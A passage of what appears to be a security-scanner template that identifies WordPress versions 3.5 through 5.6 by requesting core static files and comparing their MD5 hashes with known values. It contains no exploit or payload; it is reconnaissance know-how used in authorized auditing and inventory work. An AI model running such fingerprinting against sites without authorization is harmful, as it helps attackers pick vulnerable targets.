5.6 - dsl: - - "(\"db33e7676b65cdbfddbe8cdce17ca068\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-embed.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"b8d94a6648c7a70c0496257bb2699599\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.6.20 - dsl: - - "(\"1c577cfb3bb7bf736f663243e04dc2f6\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.2 - dsl: - - "(\"2463b0d386cc5e574f4c6702ecd36490\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.8 - dsl: - - "(\"fdf2054f397ff2b9a724c63fbe1013ef\" == md5(body))" - - type: dsl - name: 4.9.9 - 5.0.11 - dsl: - - "(\"74194cbcf228ab10c16d37fded70705b\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"23e24e824f384c5eb11e73576b4ac93c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-formdata.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"2265a1bd3059b1a457381c86d5dd9052\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"ed823838339ca0f88793fa781fc1e10d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"7f233f44898ccd1f7284963110804e5f\" == md5(body))" - - type: dsl - name: 5.1 - 5.6 - dsl: - - "(\"2ea232d2a383e59441dc21dc56300749\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/ie-rtl.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"29628f240ceb396ef0b56da19cf30f8c\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"2d76574de73331ae9a0bae951abc5490\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"f62d0a9886eca92d1dba632dc5f46f1d\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"db4a9159f318b8a8d1dce9cd40628d51\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"46dca3fdd473c8b6cec51e3ff5d700c6\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"4106f98f5e50d92365ae8de1bb31b17e\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"eedd69d39fbf83d70c4a58388d86b78e\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"1adb87b01b6c9adc1d7c8945f5cd06cd\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"a3c0334eac78e5a18d33185363c6bc50\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"dce16834bbccd5cd685549a17fb33f54\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"4cea98cb05da1da6b9f302f8f34fd16b\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"d3948c5ae3ff777bee390743048c01ed\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"63b9fc0fc0d229a570d73b78f182f030\" == md5(body))" - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"d2b699f14ca35864ecdd61c8eec9604d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/ie.min.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"3ad10e15b536d246988e4107372192ad\" == md5(body))" - - type: dsl - name: 4.5 - 4.6.20 - dsl: - - "(\"135aac1749fb85f75120b1391ace9b2c\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"ece593e9a38bcf8e294ccb0e5618cb92\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"155dad24f705111873d99ba61cf7ac98\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"494254d427a06ead698729501d1706c9\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"057d4b0dc0761731460c3a78711242cf\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"7f6bf805e4601032047107ba844e06a6\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"af04e0352749d2834d0f8ff8bbcd1727\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"c48f03938beb59b2bc71921974abd386\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"eed95b401c0cbd317ef19bfda30dd91f\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"3ce438c585dd0ae1a261fafbf8d88629\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"c2f2191e1ed405bd0ba32bf2cc6f7bad\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"1447ed1679f787adc186df8eac30ce1e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"ec0296e848d93d9d119ae07bc0085a3b\" == md5(body))" - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"76ca02b48506b7c718e88c0b1d1cee08\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/code-editor.css" - matchers: - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"4633889cc5ae0bd0607d589c1eacae8c\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"2982623d3fb11fcd05f8eb36b84cb557\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"19df2fb667479f623db601ed0ac2f185\" == md5(body))" - - type: dsl - name: 5.2 - 5.6 - dsl: - - "(\"434192ef92ee1de6c2d24ffa1b5eee29\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/sodium_compat/src/Core/Curve25519/README.md" - matchers: - - type: dsl - name: 5.2 - 5.6 - dsl: - - "(\"1659a2aacf9bd1767f6a9fd70ac085cf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/sodium_compat/src/Core32/Curve25519/README.md" - matchers: - - type: dsl - name: 5.2 - 5.6 - dsl: - - "(\"1659a2aacf9bd1767f6a9fd70ac085cf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-sanitize.min.js" - matchers: - - type: dsl - name: 4.9 - 5.2.2 - dsl: - - "(\"60b4efeac56fd08f7ba4f0f48e915dae\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"3e03f2d302e5c48328d7bbf14a518f5e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"345ce3beb91fab17ded64b7914e47a98\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"5e8febbd8db3d3de4c68ec632b6883fe\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tw-sack.min.js" - matchers: - - type: dsl - name: 3.7.34 - 5.2.9 - dsl: - - "(\"bc4487194e1f88126b8a500ad47e6889\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"a1c18227e6e93798c493aed96ee6cc84\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.33 - dsl: - - "(\"fb8bf6785e55e9e39bea552635c42a64\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"f103f8c3fb6d11562faf82f3943459c7\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"a3b3fabcf845edad4a169343add9b94b\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"18da1537e85888cf774f9c1985710c61\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/json2.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"35d899a81986173f44f9bbe686cc583c\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"c9858d42fa9f0d03f5e62ffda9c4b491\" == md5(body))" - - type: dsl - name: 3.7.34 - 4.3.25 - dsl: - - "(\"34a938334208cacfd97631b04283ddd9\" == md5(body))" - - type: dsl - name: 3.7 - 4.2.29 - dsl: - - "(\"ef4188cb0b60a72017f4c8a1e840ab1e\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"ba3293970e13b03a2ea92f5b6b5bf544\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"c5fe2b8725d6986faa885f6dcc1771dc\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"733e4f25a6dd1b1bd1094e711666aeda\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-custom-header.min.js" - matchers: - - type: dsl - name: 4.7 - 5.2.9 - dsl: - - "(\"802bee0e5f600483e0247f59b3b329b4\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"95b069cef80307604eb843676b41da51\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"5906907f0e17e15c5048fa1755739ac1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/colorpicker.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"e186209dc41a59f2fb627c24e640712d\" == md5(body))" - - type: dsl - name: 3.7.34 - 4.5.23 - dsl: - - "(\"58ab2fba61b092b0f4efe8aaa3b2864e\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"350af5af9077a62d67bae1f33a4f48fc\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"2d4c4e47b6dcb0ae0352459b3d7641c3\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"3086288f91098c51c719dc0e5874492c\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"3211fa8ad9b5ff52a438e30c3b7c2998\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"71131b3bc63bacef4c40b16235c5e735\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"b31d1b558c94797b5bc14d2ce6374178\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-backbone.min.js" - matchers: - - type: dsl - name: 4.5 - 5.2.9 - dsl: - - "(\"b978d3c20a25ca1d36c1688c298c8239\" == md5(body))" - - type: dsl - name: 3.9 - 4.4.24 - dsl: - - "(\"b569e29ff8fd482e0ee75e1494085621\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"355454f73b6cb8b46bac2dfbd1991b0a\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"aade6cd57d7e3565cbaa089fd3b0efe1\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"643ca3336f29d3cab7ce9dd7da8bc2a6\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"a38ce053c5664bc2449c10f98d2d2917\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wpdialog.min.js" - matchers: - - type: dsl - name: 3.9 - 5.2.9 - dsl: - - "(\"d22d9fa5bb00ba0667080da846c4a1be\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"f115cf2572a2a18ae56ec045f61abafe\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"3d6e52f38f2de2ef4b50e3cd3d8cb53c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/hoverIntent.min.js" - matchers: - - type: dsl - name: 4.2 - 5.2.9 - dsl: - - "(\"ca500ade854c31417faf5762e31b9d00\" == md5(body))" - - type: dsl - name: 3.7 - 4.1.32 - dsl: - - "(\"6f0074f1f2d119430222bc3c0950ac2f\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"c437e5d75778eae76b508b0a636f555c\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"e7b615fa36594e4ba18d0b71ca0b39c8\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"fcaf34b14eacc973d37e9ab8c6ad6c65\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"ab33227e56c7fcc9e1c626e910106cef\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/zxcvbn-async.min.js" - matchers: - - type: dsl - name: 3.7 - 5.2.9 - dsl: - - "(\"3196e9b61f703909e139ce7e049a7ffd\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"bf8ad109c3719269fdec077456a255e0\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"1ea3d35fc9ace7cd413a744524bf26c9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-list-revisions.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"d252f431d400b696e25ca9fec9a1113e\" == md5(body))" - - type: dsl - name: 3.7 - 4.5.23 - dsl: - - "(\"b4031fcf4f4279be864d4bd82f7fc46c\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"a539afdba6c8cc71a580347083eee7d1\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"6bca22d5b17b85037767147333536b25\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"50907a74cc5046688748ec7910a806ca\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-util.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"83118aa939b5832dd4e1cad8b186012c\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"d099d4d6b145900b334fc3215ff55791\" == md5(body))" - - type: dsl - name: 3.7.34 - 4.2.29 - dsl: - - "(\"39ca66318ef66201510aebcaad263210\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.33 - dsl: - - "(\"f96c33819e26e9187e5d23bf2de399bc\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"ed55a3ebb6ae3bb03f049538496a15b3\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"d7d084f508f3d6965efc4be3bcfa255e\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"12b99b14f0a718568e3e516f36bdb886\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-lists.min.js" - matchers: - - type: dsl - name: 4.7 - 5.2.9 - dsl: - - "(\"7df18b42cbd5cbaa5067c06f57aa876b\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"2a89454a1a6e55235a35d2fdb7e21288\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"a255f1d03060ae5e5f8d6f1b6238c7b7\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"8802453513507186e7cff5316d83bc1e\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"98747c729c8e35d2d6781cc587d9d291\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.33 - dsl: - - "(\"fe4f0bb44f6aa5584e2969665f2e6aa6\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"c7b59d9b7e2339b76708ccff21cfe930\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"df360a33e64d91258ff738d8ae445397\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"8193a9bc8e1d51b1945eaba9616971fe\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.8.35 - dsl: - - "(\"359c22a08c86586f34c59a1f05bee149\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/word-count.min.js" - matchers: - - type: dsl - name: 4.3 - 5.2.9 - dsl: - - "(\"997f505fc9d24a27e4939641450e96a4\" == md5(body))" - - type: dsl - name: 3.8 - 4.2.29 - dsl: - - "(\"c71cccaeb645b4e75e963aecff2f5fc6\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"5ecafe9ee88afb02ea468552f41c608d\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"bd315c9a2ccbf08260689037e63721ad\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"3bd992110e70a32eceff0c0243f33171\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"2de2fdb4605ef9fd1db104da6e1ef5ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/link.min.js" - matchers: - - type: dsl - name: 3.7 - 5.2.9 - dsl: - - "(\"f9ff4694933001933bdec2c133b2252d\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"58be56b4289c7fad06598d3d4d8ce1f8\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"03ef1e8b6d8670cd60cae80839934c69\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"3c2b5fe432b3e74d2f0317612b6ad589\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"a8cbfa799d19910979e8703ed7498c5b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/language-chooser.min.js" - matchers: - - type: dsl - name: 4.0 - 5.2.9 - dsl: - - "(\"1d6822384a71090c74add106e4468581\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"1e20e39aa9b8414f11608d62414ddd1e\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"376515a45db7b25e4a11f05bed321958\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-audio-widget.min.js" - matchers: - - type: dsl - name: 4.8 - 5.2.9 - dsl: - - "(\"ca37de8a34e673469901c4113e99d693\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"cf2e2e5b78863f6c5bd85bbf4594dbc2\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"30a021c3001e66ca247dfeff5695d387\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/accordion.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"226bc149fc7a1d2d56e4530d3b685e58\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"e97f90fda0240174382921696f5a7ebe\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"cfa0d94d00f7a8a147c3815dc819e114\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"7e21d082e2c0386ef6fe6571e7880e20\" == md5(body))" - - type: dsl - name: 3.7 - 3.9.33 - dsl: - - "(\"eb1fdf4f1d54234db56aaf3b979bb37f\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"ac7c461283eed11c59afbaf9557e6520\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"67459976d4b544d88025aacbcc5d922c\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"65b4fed487bb9839510393b2a5c573d4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/svg-painter.min.js" - matchers: - - type: dsl - name: 4.6 - 5.2.9 - dsl: - - "(\"a79aca561a5b87b62a710b0526a8e4bd\" == md5(body))" - - type: dsl - name: 3.8.34 - 4.5.23 - dsl: - - "(\"8af3a4fbdca543699984d98cf95d1b03\" == md5(body))" - - type: dsl - name: 3.9 - 4.2.29 - dsl: - - "(\"8db7f2acb2c205b766167517ccce7f8a\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"d149da3de567730515abb2a9a2570e8a\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"000daef8be797700bf57756a191f0097\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"c71153a1a202375d132936a337709e26\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/user-suggest.min.js" - matchers: - - type: dsl - name: 3.9 - 5.2.9 - dsl: - - "(\"e089545cd7fcde5c7cd70de3a70139e1\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"6ab5530d88daf1b8a2a1cf629868dcc9\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"77f81ca93899eaae1f67dbb695ead0e3\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"846c3cc0ede47e280f7ed75066394d36\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"87209d46b9230db274cb2a463505b902\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"d19dcca2d1e1ecc4564e339ada19f6c3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/wp-mediaelement.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"7f5a63461a4870dcff29bcf63b6c9910\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.19 - dsl: - - "(\"8e7a4405d35139f62871a539516679a1\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"bbc4f3add6171c484f437bb1ffdc916d\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.2.9 - dsl: - - "(\"5d06470c0ac27ec77a1a6352f0558e35\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2b67f971fa55ec7f55b25c0af6f459a1\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"55297aab43dc737301324eac9dfed60d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-preview-widgets.min.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"5b40ade72a4e6add4ec2147a58859a4b\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"3451b304328c37c168f92f2dab48fcee\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"b9b99fe065ec4736507c69be831a275c\" == md5(body))" - - type: dsl - name: 4.0 - 4.4.24 - dsl: - - "(\"05c7517e06bb14b5eaa336c261b99b81\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"1193b5a24ea9327bbf3661c68b64cf80\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"a5f3b545a796e07e300f08d3c1e5386b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"7c7901cd82ff1df1dbc556fe17d42024\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"a8a1e6df35c41ccb093b228d72cfd050\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-image-widget.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"7906c28d01cc9fd1425457fcd672d1f0\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"b02a9bf568ddbf039eb477f8db40783c\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"5cdd681b80ed5519adb2c9607f04d23c\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"0806273a8f28ca374831208bc1444375\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-video-widget.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"0ab80e738428314137a73a82460a87ae\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"b86c749b784acc5a8481b0888619234c\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"186734538503669929e8d152100c2696\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"d4a7e5ea513e162317f02081d00d2f4d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/code-editor.min.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"3a55d10a30b356e96dd77cd870171558\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"cc5081a21ab16c3e074aea785487432b\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"7e211c9b4b06d1d41fc28d88b3968d90\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/media-gallery-widget.min.js" - matchers: - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"3fbbc0b9f61ddca152fa3847aba20581\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"a8a1e7473d3a063c4e783d0bc44ec83d\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"d60c2db4e35e359b8a2816c93e768ea1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/xfn.min.js" - matchers: - - type: dsl - name: 3.8 - 4.9.5 - dsl: - - "(\"66b227ca28f41f2e0615b04a390d5e04\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"5467d9418e2842e476e453fd741fdbc5\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"f3b3ae0e44fefe8c9bbb517f24c1b9bd\" == md5(body))" - - type: dsl - name: 4.9.6 - 5.2.9 - dsl: - - "(\"1b6f6842124166a08328aa7ad376027e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"a8ec7c5389884c02249560b08ba149bb\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"294d8e8a6989bfc618c1f6ad7d3554e5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wp-embed.min.js" - matchers: - - type: dsl - name: 4.7 - 4.9.8 - dsl: - - "(\"5a03f97cc479b9f5d7efdaccec31bc17\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"687bf3104f17a2e9afced6d17acb384f\" == md5(body))" - - type: dsl - name: 4.4.3 - 4.5.23 - dsl: - - "(\"0203f8b4d98102d02f6a569c40a47d7b\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.2 - dsl: - - "(\"2fb8dee3969a7597d0d892028e01cc2e\" == md5(body))" - - type: dsl - name: 4.9.9 - 5.2.9 - dsl: - - "(\"2dce40d16f9ff6332d3cbb7ae488a2b9\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"04133d37cfd0f08267530b905a5ffff3\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"8ed6038a5dbf62380de72a681340afd3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/underscore.min.js" - matchers: - - type: dsl - name: 4.5 - 5.0.11 - dsl: - - "(\"6a3a434a1360cc744341e97de9177bc6\" == md5(body))" - - type: dsl - name: 4.2 - 4.4.24 - dsl: - - "(\"929daff1019e5493c0486bfb7a642e2e\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"252137d39d087bba598caf8cf94d2aec\" == md5(body))" - - type: dsl - name: 3.6 - 3.8.35 - dsl: - - "(\"4f76be3bf897efbc3c44acbcbe1f4947\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"a8167cbe4acedc5f0132f7b087c24bd0\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"0bd7146b45c933ad9bfe210a41cd79b1\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"dc95efbaca369dccfda71412431de555\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"039ca2cb0b64e4962638e527bb56e8d0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/utils.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"f6e3d57217de41fa3243331155452bb1\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"f4c1bfc14e78c5ccdcbdff37cd463733\" == md5(body))" - - type: dsl - name: 4.0 - 4.3.25 - dsl: - - "(\"41fa39bcefcede21b93beb099cfa78d7\" == md5(body))" - - type: dsl - name: 3.8 - 3.9.33 - dsl: - - "(\"06f830e4be5cac10b951ee7e59e43e39\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"8b1224eaeca8bc3cddd4b9bcaab54802\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"284f0a2c317e3e094f08677e1b451c8a\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"b281e77e23b0bc3cc9c19cb36e7e6286\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"c6fe48bca8ff16583cacfe347d4a6fd8\" == 